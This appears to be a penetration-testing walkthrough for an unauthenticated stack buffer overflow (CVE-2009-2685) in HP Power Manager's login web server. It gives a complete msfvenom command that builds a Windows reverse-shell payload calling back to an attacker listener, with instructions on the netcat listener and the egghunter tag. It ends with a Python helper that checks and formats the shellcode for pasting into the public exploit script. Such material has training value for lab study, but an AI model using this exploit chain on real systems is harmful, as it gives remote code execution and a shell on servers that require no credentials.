HP Power Manager

HP Power Manager is a Windows-based management application from Hewlett-Packard for monitoring and controlling power across HP servers, attached power equipment and client devices. Administrators use it to enforce power policies, schedule power-on/power-off or sleep/hibernate states, and report on real-time and historical power metrics. It is administered through a built-in management web server, which is the component the vulnerability below lives in.

Unauthenticated RCE

HP Power Manager is affected by a stack-based buffer overflow in the login form of its management web server (CVE-2009-2685; the advisory lists versions before 4.2.10 as affected). No credentials are required: an unauthenticated remote attacker sends an over-long, specially crafted value in the Login parameter, corrupting the stack and redirecting execution to attacker-controlled code that runs in the context of the web server process. A working Python PoC is available as Exploit-DB 10099 (10099.py); it only needs fresh shellcode pointing at your own listener, generated as follows:

# Generate the payload. -b lists the bytes that must not appear anywhere in
# the encoded shellcode: the Login value travels as URL-encoded form data,
# so bytes such as & = + % ? # and whitespace would be consumed or rewritten
# by the request parser before they reach the vulnerable copy (\x25 is
# listed twice in the original command; the duplicate is harmless).
# x86/alpha_mixed emits an alphanumeric decoder stub that avoids all of
# them, and -f c prints C string syntax that pastes straight into the
# script. Replace LHOST/LPORT with the address and port of your listener.
msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.45.241 LPORT=80 -e x86/alpha_mixed -f c

Paste the encoded bytes into the SHELL string of the script, keeping the "n00bn00b" prefix in place: it is the egg tag that the script's egghunter stage scans memory for, so the shellcode is only found and executed if it directly follows that tag. The two comment lines above SHELL describe the original author's encoded shellcode and can be updated or ignored. Start a listener on LPORT before running the script (for example nc -nlvp 80):

10099.py
<SNIP>

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\...<SNIP>...\x5a")

<SNIP>
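Before pasting fresh shellcode into 10099.py it is worth checking it mechanically rather than by eye. The helper below is an added example, not code from the original page or from the 10099.py script: it parses msfvenom's -f c output into bytes, reports every bad character from the command above together with its offset, verifies that the egg tag is still in front, and runs the value through a generic application/x-www-form-urlencoded decoder to show which bytes would not survive request parsing. The sample msfvenom output is constructed for illustration, and the form decoder models a typical parser, not HP Power Manager's actual one.

```python
import re
from urllib.parse import unquote_to_bytes

# Bad characters exactly as given to msfvenom -b on this page (\x25 twice, as in the original).
BADCHARS = b"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"

# Egg tag that 10099.py's egghunter looks for; it must precede the shellcode.
EGG = b"n00bn00b"

# Constructed stand-in for what `msfvenom ... -f c` prints (not the real 709-byte buffer).
SAMPLE_MSFVENOM_C = r'''unsigned char buf[] = 
"\x89\xe2\xd9\xeb\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a"
"\x43\x43\x43\x43\x43\x50\x59\x49\x49\x49\x49\x49";
'''


def parse_c_shellcode(text):
    """Turn msfvenom's -f c output (quoted "\\xNN..." lines) into raw bytes."""
    out = bytearray()
    for m in re.finditer(r'"((?:\\x[0-9a-fA-F]{2})+)"', text):
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def find_bad_chars(shellcode, badchars=BADCHARS):
    """Map each bad byte that occurs in shellcode to the offsets where it appears."""
    hits = {}
    for off, b in enumerate(shellcode):
        if b in badchars:
            hits.setdefault(b, []).append(off)
    return hits


def form_roundtrip(value):
    """Model a generic form-urlencoded parser: returns what it would see as the Login value.

    '&' splits fields, '+' becomes a space and '%XX' is percent-decoded, which is
    why those bytes are on the bad-character list."""
    body = b"Login=" + value + b"&Password=x"
    fields = {}
    for pair in body.split(b"&"):
        key, _, raw = pair.partition(b"=")
        fields[key] = unquote_to_bytes(raw.replace(b"+", b" "))
    return fields.get(b"Login", b"")


def validate_egg_payload(payload, badchars=BADCHARS, egg=EGG):
    """Return a list of problems with an egg+shellcode blob; empty means it is safe to paste."""
    problems = []
    if not payload.startswith(egg):
        problems.append("payload does not start with the egg tag " + repr(egg))
    for b, offs in sorted(find_bad_chars(payload, badchars).items()):
        problems.append("bad byte 0x%02x at offsets %s" % (b, offs))
    if form_roundtrip(payload) != payload:
        problems.append("value does not survive form decoding intact")
    return problems


def to_python_literal(payload, width=16):
    """Render the blob as the multi-line SHELL string literal used in 10099.py."""
    lines = []
    for i in range(0, len(payload), width):
        lines.append('"' + "".join("\\x%02x" % b for b in payload[i:i + width]) + '"')
    return "SHELL = (\n" + "\n".join(lines) + ")"


if __name__ == "__main__":
    sc = parse_c_shellcode(SAMPLE_MSFVENOM_C)
    blob = EGG + sc
    print("problems:", validate_egg_payload(blob) or "none")
    print(to_python_literal(blob))
```

Run it against the real msfvenom output by replacing SAMPLE_MSFVENOM_C with the pasted text; an empty problem list means the blob can go into SHELL unchanged, while a non-empty one shows exactly which byte (and which offset) the encoder failed to avoid.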
